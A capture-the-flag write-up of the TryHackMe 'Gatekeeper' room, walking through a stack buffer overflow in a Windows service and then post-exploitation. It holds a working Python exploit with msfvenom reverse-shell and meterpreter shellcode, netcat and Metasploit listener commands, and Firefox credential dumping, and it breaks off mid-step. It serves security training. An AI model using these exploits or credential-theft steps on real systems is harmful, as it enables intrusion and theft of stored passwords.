---
title: "TryHackMe - Gatekeeper Writeup"
summary: "Writeup of Gatekeeper room on TryHackMe"
categories: ["writeup"]
tags: ["tryhackme", "bof", "privesc", "windows"]
showSummary: true
date: 2022-12-19
draft: false
---

## Recon
Firstly, we run `nmap`:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ nmap -A 10.10.110.230                      
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-18 14:30 CET
Nmap scan report for 10.10.110.230
Host is up (0.040s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.93%I=7%D=12/18%Time=639F160C%P=aarch64-unknown-linux-
SF:gnu%r(GetRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!
SF:!\n")%r(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHe
SF:llo\x20Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<s
SF:ip:nm@nm>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20C
SF:all-ID:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20M
SF:ax-Forwards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20C
SF:ontact:\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\n
SF:Hello\x20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n"
SF:)%r(HTTPOptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\
SF:r!!!\n")%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHel
SF:lo\x20\r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hel
SF:lo\x20\x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(
SF:TLSSessionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n"
SF:)%r(FourOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.t
SF:xt%2ebak\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x2
SF:0\x01default!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x0
SF:1!!!\n");
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02c4a8a9ae4d (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-12-18T08:33:18-05:00
| smb2-time: 
|   date: 2022-12-18T13:33:18
|_  start_date: 2022-12-18T13:30:10
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.70 seconds
```

There is a service name `Elite` on port `31337` and `smb` as well as `rdp` are open.

Let's try to enumerate `smb`:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ smbclient -L 10.10.110.230         
Password for [WORKGROUP\parallels]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.110.230 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

We can see that anonymous login is enabled and the `Users` directory is shared. Onto one of the subdirectories, there is an executable `gatekeeper.exe`.
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ smbclient \\\\10.10.110.230\\Users                     
Password for [WORKGROUP\parallels]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri May 15 03:57:08 2020
  ..                                 DR        0  Fri May 15 03:57:08 2020
  Default                           DHR        0  Tue Jul 14 09:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:54:24 2009
  Share                               D        0  Fri May 15 03:58:07 2020

                7863807 blocks of size 4096. 3878628 blocks available
smb: \> cd Share
smb: \Share\> ls
  .                                   D        0  Fri May 15 03:58:07 2020
  ..                                  D        0  Fri May 15 03:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 07:27:17 2020

                7863807 blocks of size 4096. 3878628 blocks available
smb: \Share\> get gatekeeper.exe 
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (54.4 KiloBytes/sec) (average 54.4 KiloBytes/sec)
```

The program is a `PE32` executable:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ file gatekeeper.exe 
gatekeeper.exe: PE32 executable (console) Intel 80386, for MS Windows
```

Therefore, we need a **Windows 32bits machine**, we'll use Windows 7.

Let's open the program with **Immunity Debugger**:
![d71c8411ba45dd10510b3f43abc46b3c.png](img/d71c8411ba45dd10510b3f43abc46b3c.png)

## Fuzzing
We'll try to send a large amount of bytes to the program an see if the program crash:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ python2 -c 'print "A" * 200'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

We send the payload and it crashes:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ nc 10.10.16.78 31337
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

![f02b79827cff7f5722b6161afcd70b87.png](img/f02b79827cff7f5722b6161afcd70b87.png)

## Find offset
Now, we need to find the exact offset where the program is crashing. We begin by generating a pattern of 200 bytes:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
```

Then, we add it in the payload variable in this script:
```python
import socket

ip = "10.10.16.78"
port = 31337

offset = 0  
overflow = "A" * offset  
retn = ""   
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5A>"
padding = ""
postfix = ""

buffer = overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")
```

Once the script is executed, we can see on **Immunity Debugger** where the program crashed, with the help of `mona`:
![686b95cdf9499b475385f064f6cf2896.png](img/686b95cdf9499b475385f064f6cf2896.png)

As you can see, the `EIP` offset is **146**. Let's add it to our script and set the `retn` to `BBBB` in order to check if `EIP` is overwritten with `42424242`.

```python
import socket

ip = "10.10.16.78"
port = 31337

offset = 146
overflow = "A" * offset
retn = "BBBB"
payload = ""
padding = ""
postfix = ""

buffer = overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")
```

As you can see, `EIP` is indeed overwritten with `42424242`:
![6fdc31f72c65391bbb854560b784e710.png](img/6fdc31f72c65391bbb854560b784e710.png)

## Find Bad Chars
Now, we need to find potentials bad chars in order to exclude `jmp esp` addresses containg one of them. So we begin by generating a bytearray excluding `\x0` with mona.

So we begin by setting the program folder, then we generate a bytearray:
```
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
```
![0c36a94aebf7058b61e44963f88d3ead.png](img/0c36a94aebf7058b61e44963f88d3ead.png)

Then we use the following python script to generate a bytearray and add it on the payload variable of the previous script:
```python
#!/usr/bin/env python
from __future__ import print_function

for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')

print()
```

Once the application is crashed, we'll compare the two bytearray. We need the `ESP` address:
![1f4d254cbcb0cb0aabe58ab73c776e6f.png](img/1f4d254cbcb0cb0aabe58ab73c776e6f.png)

Apparently, `\x00` and `\x0a` are bad chars:
![c383bc810a729ce5fc69c5bb32686849.png](img/c383bc810a729ce5fc69c5bb32686849.png)

So, let's exclude `\x0a` of the bytearray with mona and remove it of the payload variable:
```
!mona bytearray -b "\x00\x07"
```
Now, the comparison returns `Unmodified`, it means that we cannot jump to addresses with `\x00` and `\x0a` chars.
![32903455102130aee351ec03e5fb2f2d.png](img/32903455102130aee351ec03e5fb2f2d.png)

## Find a jump point
Now, we need to find a jump point (every `jmp esp` intructions).
![244450776605d7615780d7bb0059e9de.png](img/244450776605d7615780d7bb0059e9de.png)

We choose one of the addresses and add it on the `retn` variable. Be careful to write it in little endian.

## Generate Payload
Then, we generate a payload without the `\x00` char.
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.5.152 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] = 
"\xbd\x7d\xa5\x1c\x04\xda\xc3\xd9\x74\x24\xf4\x58\x31\xc9"
"\xb1\x52\x31\x68\x12\x83\xc0\x04\x03\x15\xab\xfe\xf1\x19"
"\x5b\x7c\xf9\xe1\x9c\xe1\x73\x04\xad\x21\xe7\x4d\x9e\x91"
"\x63\x03\x13\x59\x21\xb7\xa0\x2f\xee\xb8\x01\x85\xc8\xf7"
"\x92\xb6\x29\x96\x10\xc5\x7d\x78\x28\x06\x70\x79\x6d\x7b"
"\x79\x2b\x26\xf7\x2c\xdb\x43\x4d\xed\x50\x1f\x43\x75\x85"
"\xe8\x62\x54\x18\x62\x3d\x76\x9b\xa7\x35\x3f\x83\xa4\x70"
"\x89\x38\x1e\x0e\x08\xe8\x6e\xef\xa7\xd5\x5e\x02\xb9\x12"
"\x58\xfd\xcc\x6a\x9a\x80\xd6\xa9\xe0\x5e\x52\x29\x42\x14"
"\xc4\x95\x72\xf9\x93\x5e\x78\xb6\xd0\x38\x9d\x49\x34\x33"
"\x99\xc2\xbb\x93\x2b\x90\x9f\x37\x77\x42\x81\x6e\xdd\x25"
"\xbe\x70\xbe\x9a\x1a\xfb\x53\xce\x16\xa6\x3b\x23\x1b\x58"
"\xbc\x2b\x2c\x2b\x8e\xf4\x86\xa3\xa2\x7d\x01\x34\xc4\x57"
"\xf5\xaa\x3b\x58\x06\xe3\xff\x0c\x56\x9b\xd6\x2c\x3d\x5b"
"\xd6\xf8\x92\x0b\x78\x53\x53\xfb\x38\x03\x3b\x11\xb7\x7c"
"\x5b\x1a\x1d\x15\xf6\xe1\xf6\x10\x0c\xec\x9e\x4d\x10\xee"
"\x8f\xd1\x9d\x08\xc5\xf9\xcb\x83\x72\x63\x56\x5f\xe2\x6c"
"\x4c\x1a\x24\xe6\x63\xdb\xeb\x0f\x09\xcf\x9c\xff\x44\xad"
"\x0b\xff\x72\xd9\xd0\x92\x18\x19\x9e\x8e\xb6\x4e\xf7\x61"
"\xcf\x1a\xe5\xd8\x79\x38\xf4\xbd\x42\xf8\x23\x7e\x4c\x01"
"\xa1\x3a\x6a\x11\x7f\xc2\x36\x45\x2f\x95\xe0\x33\x89\x4f"
"\x43\xed\x43\x23\x0d\x79\x15\x0f\x8e\xff\x1a\x5a\x78\x1f"
"\xaa\x33\x3d\x20\x03\xd4\xc9\x59\x79\x44\x35\xb0\x39\x64"
"\xd4\x10\x34\x0d\x41\xf1\xf5\x50\x72\x2c\x39\x6d\xf1\xc4"
"\xc2\x8a\xe9\xad\xc7\xd7\xad\x5e\xba\x48\x58\x60\x69\x68"
"\x49";
```

Here is the new payload:
```python
import socket

ip = "10.10.16.78"
port = 31337

offset = 146
overflow = "A" * offset
retn = "\xc3\x14\x04\x08"
payload = ("\xbd\x7d\xa5\x1c\x04\xda\xc3\xd9\x74\x24\xf4\x58\x31\xc9"
"\xb1\x52\x31\x68\x12\x83\xc0\x04\x03\x15\xab\xfe\xf1\x19"
"\x5b\x7c\xf9\xe1\x9c\xe1\x73\x04\xad\x21\xe7\x4d\x9e\x91"
"\x63\x03\x13\x59\x21\xb7\xa0\x2f\xee\xb8\x01\x85\xc8\xf7"
"\x92\xb6\x29\x96\x10\xc5\x7d\x78\x28\x06\x70\x79\x6d\x7b"
"\x79\x2b\x26\xf7\x2c\xdb\x43\x4d\xed\x50\x1f\x43\x75\x85"
"\xe8\x62\x54\x18\x62\x3d\x76\x9b\xa7\x35\x3f\x83\xa4\x70"
"\x89\x38\x1e\x0e\x08\xe8\x6e\xef\xa7\xd5\x5e\x02\xb9\x12"
"\x58\xfd\xcc\x6a\x9a\x80\xd6\xa9\xe0\x5e\x52\x29\x42\x14"
"\xc4\x95\x72\xf9\x93\x5e\x78\xb6\xd0\x38\x9d\x49\x34\x33"
"\x99\xc2\xbb\x93\x2b\x90\x9f\x37\x77\x42\x81\x6e\xdd\x25"
"\xbe\x70\xbe\x9a\x1a\xfb\x53\xce\x16\xa6\x3b\x23\x1b\x58"
"\xbc\x2b\x2c\x2b\x8e\xf4\x86\xa3\xa2\x7d\x01\x34\xc4\x57"
"\xf5\xaa\x3b\x58\x06\xe3\xff\x0c\x56\x9b\xd6\x2c\x3d\x5b"
"\xd6\xf8\x92\x0b\x78\x53\x53\xfb\x38\x03\x3b\x11\xb7\x7c"
"\x5b\x1a\x1d\x15\xf6\xe1\xf6\x10\x0c\xec\x9e\x4d\x10\xee"
"\x8f\xd1\x9d\x08\xc5\xf9\xcb\x83\x72\x63\x56\x5f\xe2\x6c"
"\x4c\x1a\x24\xe6\x63\xdb\xeb\x0f\x09\xcf\x9c\xff\x44\xad"
"\x0b\xff\x72\xd9\xd0\x92\x18\x19\x9e\x8e\xb6\x4e\xf7\x61"
"\xcf\x1a\xe5\xd8\x79\x38\xf4\xbd\x42\xf8\x23\x7e\x4c\x01"
"\xa1\x3a\x6a\x11\x7f\xc2\x36\x45\x2f\x95\xe0\x33\x89\x4f"
"\x43\xed\x43\x23\x0d\x79\x15\x0f\x8e\xff\x1a\x5a\x78\x1f"
"\xaa\x33\x3d\x20\x03\xd4\xc9\x59\x79\x44\x35\xb0\x39\x64"
"\xd4\x10\x34\x0d\x41\xf1\xf5\x50\x72\x2c\x39\x6d\xf1\xc4"
"\xc2\x8a\xe9\xad\xc7\xd7\xad\x5e\xba\x48\x58\x60\x69\x68"
"\x49")
padding = ""
postfix = ""

buffer = overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")
```

## Prepend NOPs
Since an encoder was likely used to generate the payload, you will need some space in memory for the payload to unpack itself. You can do this by setting the padding variable to a string of 16 or more `\x90` bytes:
`padding = "\x90" * 16`

## PoC
Let's start a listener and exploit the vulnerable app !
```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
10.10.16.78: inverse host lookup failed: Unknown host
connect to [10.11.5.152] from (UNKNOWN) [10.10.16.78] 49250
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Downloads>
```

## Exploit
We just need to modify the IP address on the script and run it:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
10.10.110.230: inverse host lookup failed: Unknown host
connect to [10.11.5.152] from (UNKNOWN) [10.10.110.230] 49205
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\natbat\Desktop>
```

## Enumeration
Now, we are looking for a privilege escalation path. We found a Firefox file on the host:
```powershell
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
10.10.180.246: inverse host lookup failed: Unknown host
connect to [10.11.5.152] from (UNKNOWN) [10.10.180.246] 49180
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\natbat\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\natbat\Desktop

05/14/2020  08:24 PM    <DIR>          .
05/14/2020  08:24 PM    <DIR>          ..
04/21/2020  04:00 PM             1,197 Firefox.lnk
04/20/2020  12:27 AM            13,312 gatekeeper.exe
04/21/2020  08:53 PM               135 gatekeeperstart.bat
05/14/2020  08:43 PM               140 user.txt.txt
               4 File(s)         14,784 bytes
               2 Dir(s)  15,878,746,112 bytes free

C:\Users\natbat\Desktop>
```

For further enumeration, we'll update the reverse shell to a meterpreter:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.5.152 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 402 (iteration=0)
x86/shikata_ga_nai chosen with final size 402
Payload size: 402 bytes
Final size of c file: 1719 bytes
unsigned char buf[] = 
"\xd9\xe8\xd9\x74\x24\xf4\xb8\xb1\x9f\xd1\xc8\x5b\x29\xc9"
"\xb1\x5e\x31\x43\x1a\x03\x43\x1a\x83\xc3\x04\xe2\x44\x63"
"\x39\x47\xa6\x9c\xba\x38\x97\x4e\xde\x33\x85\x5e\x96\xa1"
"\xa2\xcd\xa4\xa2\xe6\xe5\x85\x4b\x8d\x74\xce\xbc\x26\x32"
"\x28\xf2\x88\x6f\x08\x95\x74\x72\x5d\x75\x45\xbd\x90\x74"
"\x82\x0b\xde\x99\x5e\x07\x72\x76\x09\x9c\x31\x4a\xb4\x72"
"\x3e\xf2\xce\xf7\x81\x87\x62\xf9\xd1\xe3\x32\xe1\x81\x78"
"\x9a\x31\x23\xac\x9f\xfb\x57\x6e\xd6\x70\xa3\x05\xd9\x79"
"\xcd\xcf\x28\x46\x0f\x20\x47\xea\x91\x78\x6f\x12\xe4\x72"
"\x8c\xaf\xff\x40\xef\x6b\x75\x57\x57\xff\x2d\xb3\x66\x2c"
"\xab\x30\x64\x99\xbf\x1f\x68\x1c\x13\x14\x94\x95\x92\xfb"
"\x1d\xed\xb0\xdf\x46\xb5\xd9\x46\x22\x18\xe5\x99\x8a\xc5"
"\x43\xd1\x38\x13\xf3\x1a\xc3\x1c\xa9\x8c\x08\xd1\x52\x4d"
"\x06\x62\x20\x7f\x89\xd8\xae\x33\x42\xc7\x29\x45\x44\xf8"
"\xe6\xed\x04\x06\x07\x0e\x0d\xcd\x53\x5e\x25\xe4\xdb\x35"
"\xb5\x09\x0e\xa3\xbf\x9d\xbb\x3f\xba\xc5\xd4\x3d\xc4\xe4"
"\x78\xcb\x22\x56\xd1\x9b\xfa\x17\x81\x5b\xaa\xff\xcb\x53"
"\x95\xe0\xf3\xb9\xbe\x8b\x1b\x14\x97\x23\x85\x3d\x63\xd5"
"\x4a\xe8\x0e\xd5\xc1\x19\xef\x98\x21\x6b\xe3\xcd\x55\x93"
"\xfb\x0d\xf0\x93\x91\x09\x52\xc3\x0d\x10\x83\x23\x92\xeb"
"\xe6\x37\xd4\x14\x77\x0e\xaf\x23\xed\x2e\xc7\x4b\xe1\xae"
"\x17\x1a\x6b\xaf\x7f\xfa\xcf\xfc\x9a\x05\xda\x90\x37\x90"
"\xe5\xc0\xe4\x33\x8e\xee\xd3\x74\x11\x10\x36\x07\x56\xee"
"\xc5\x20\xff\x87\x35\x71\xff\x57\x5f\x71\xaf\x3f\x94\x5e"
"\x40\xf0\x55\x75\x09\x98\xdc\x18\xfb\x39\xe1\x30\x5d\xe4"
"\xe2\xb7\x46\x17\x99\xb8\x79\xd8\x5e\xd1\x1d\xd8\x5f\xdd"
"\x23\xe4\xb6\xe4\x51\x2b\x0b\x53\x79\xb6\xa1\xae\x12\x6f"
"\x20\x13\x7f\x90\x9f\x50\x86\x13\x15\x29\x7d\x0b\x5c\x2c"
"\x39\x8b\x8d\x5c\x52\x7e\xb1\xf3\x53\xab";
```

And then we create a listener:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/brainstorm]
└─$ msfconsole        
                                                  

                                   .,,.                  .                                                                                                                                                         
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P                                                                                                                                      
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p                                                                                                                                    
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'                                                                                                                                       
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P                                                                                                                                       
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b                                                                                                                                   
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b                                                                                                                                      
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88                                                                                                                                           
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'                                                                                                                                               
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:                                                                                                                                      
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'                                                                                                                                    
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'                                                                                                                                     
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'                                                                                                                                      
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'                                                                                                                                       
_______________________________________________________________   ,&$$$$$$'_____                                                                                                                                   
                                                                 ll&&$$$$'                                                                                                                                         
                                                              .;;lll&&&&'                                                                                                                                          
                                                            ...;;lllll&'                                                                                                                                           
                                                          ......;;;llll;;;....                                                                                                                                     
                                                           ` ......;;;;... .  .                                                                                                                                    
                                                                                                                                                                                                                   

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable verbose logging with set VERBOSE 
true                                                                                                                                                                                                               
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.11.5.152
lhost => 10.11.5.152
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.11.5.152:4444 
[*] Sending stage (175686 bytes) to 10.10.180.246
[*] Meterpreter session 1 opened (10.11.5.152:4444 -> 10.10.180.246:49198) at 2022-12-19 08:03:40 +0100

meterpreter > sysinfo
Computer        : GATEKEEPER
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
```

Another time, we can see that Firefox is installed on the host. We'll try to dump creds:
```bash
meterpreter > run post/multi/gather/firefox_creds 

[-] Error loading USER S-1-5-21-663372427-3699997616-3390412905-1000: Hive could not be loaded, are you Admin?
[*] Checking for Firefox profile in: C:\Users\natbat\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release
[+] Downloaded cert9.db: /home/parallels/.msf4/loot/20221219080533_default_10.10.180.246_ff.ljfn812a.cert_294663.bin
[+] Downloaded cookies.sqlite: /home/parallels/.msf4/loot/20221219080534_default_10.10.180.246_ff.ljfn812a.cook_609897.bin
[+] Downloaded key4.db: /home/parallels/.msf4/loot/20221219080535_default_10.10.180.246_ff.ljfn812a.key4_560537.bin
[+] Downloaded logins.json: /home/parallels/.msf4/loot/20221219080536_default_10.10.180.246_ff.ljfn812a.logi_411220.bin

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\rajfzh3y.default
```

Now, there is a tool that can decrypt creds from profiles of Mozilla Firefox. Let's use it:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper]
└─$ git clone https://github.com/unode/firefox_decrypt.git                                                                                                  
Cloning into 'firefox_decrypt'...
remote: Enumerating objects: 1152, done.
remote: Counting objects: 100% (271/271), done.
remote: Compressing objects: 100% (33/33), done.
remote: Total 1152 (delta 252), reused 240 (delta 238), pack-reused 881
Receiving objects: 100% (1152/1152), 409.88 KiB | 3.53 MiB/s, done.
Resolving deltas: 100% (726/726), done.
```

But we need to rename profile files before using it:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/.msf4/loot]
└─$ mv 20221219080533_default_10.10.180.246_ff.ljfn812a.cert_294663.bin cert9.db
                                                                                                                                                                                                                   
┌──(parallels㉿kali-linux-2022-2)-[~/.msf4/loot]
└─$ mv 20221219080534_default_10.10.180.246_ff.ljfn812a.cook_609897.bin cookies.sqlite
                                                                                                                                                                                                                   
